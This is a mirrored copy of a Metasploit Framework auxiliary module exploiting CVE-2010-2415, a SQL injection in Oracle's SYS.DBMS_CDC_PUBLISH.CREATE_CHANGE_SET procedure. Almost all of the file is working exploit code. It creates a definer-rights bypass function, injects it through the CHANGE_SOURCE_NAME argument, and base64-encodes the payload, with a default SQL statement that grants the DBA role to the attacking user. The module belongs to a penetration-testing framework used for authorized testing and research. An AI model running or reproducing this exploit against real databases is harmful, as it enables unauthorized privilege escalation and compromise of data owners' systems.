Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb
19592 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::ORACLE
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET',
14
'Description' => %q{
15
The module exploits an sql injection flaw in the CREATE_CHANGE_SET
16
procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
17
on the vulnerable package can exploit this vulnerability. By default, users granted
18
EXECUTE_CATALOG_ROLE have the required privilege.
19
},
20
'Author' => [ 'MC' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2010-2415' ],
24
[ 'OSVDB', '70078'],
25
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html' ],
26
],
27
'DisclosureDate' => '2010-10-13',
28
'Notes' => {
29
'Stability' => [CRASH_SAFE],
30
'SideEffects' => [IOC_IN_LOGS],
31
'Reliability' => []
32
}
33
)
34
)
35
36
register_options(
37
[
38
OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
39
]
40
)
41
end
42
43
def run
44
return if !check_dependencies
45
46
name = Rex::Text.rand_text_alpha_upper(1..10)
47
var1 = Rex::Text.rand_text_alpha_upper(1..10)
48
var2 = Rex::Text.rand_text_alpha_upper(1..10)
49
50
function = "
51
CREATE OR REPLACE FUNCTION #{name}
52
RETURN VARCHAR2 AUTHID CURRENT_USER
53
IS
54
PRAGMA AUTONOMOUS_TRANSACTION;
55
BEGIN
56
EXECUTE IMMEDIATE '#{datastore['SQL']}';
57
COMMIT;
58
RETURN NULL;
59
END;
60
"
61
62
# PROCEDURE CREATE_CHANGE_SET
63
# Argument Name Type In/Out Default?
64
# ------------------------------ ----------------------- ------ --------
65
# CHANGE_SET_NAME VARCHAR2 IN
66
# DESCRIPTION VARCHAR2 IN DEFAULT
67
# CHANGE_SOURCE_NAME VARCHAR2 IN <-boom ;)
68
# STOP_ON_DDL CHAR IN DEFAULT
69
# BEGIN_DATE DATE IN DEFAULT
70
# END_DATE DATE IN DEFAULT
71
72
package = "
73
BEGIN
74
SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET('#{name}','#{name}','''||'||user||'.#{name}||''');
75
END;
76
"
77
78
uno = Rex::Text.encode_base64(function)
79
dos = Rex::Text.encode_base64(package)
80
81
encoded_sql = %|
82
DECLARE
83
#{var1} VARCHAR2(32767);
84
#{var2} VARCHAR2(32767);
85
BEGIN
86
#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
87
EXECUTE IMMEDIATE #{var1};
88
#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
89
EXECUTE IMMEDIATE #{var2};
90
END;
91
|
92
93
print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET...')
94
prepare_exec(encoded_sql)
95
print_status('Done...')
96
end
97
end
98
99